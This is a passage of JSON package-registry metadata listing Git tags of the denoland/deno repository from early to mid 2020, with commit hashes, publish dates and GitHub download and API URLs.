f1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"co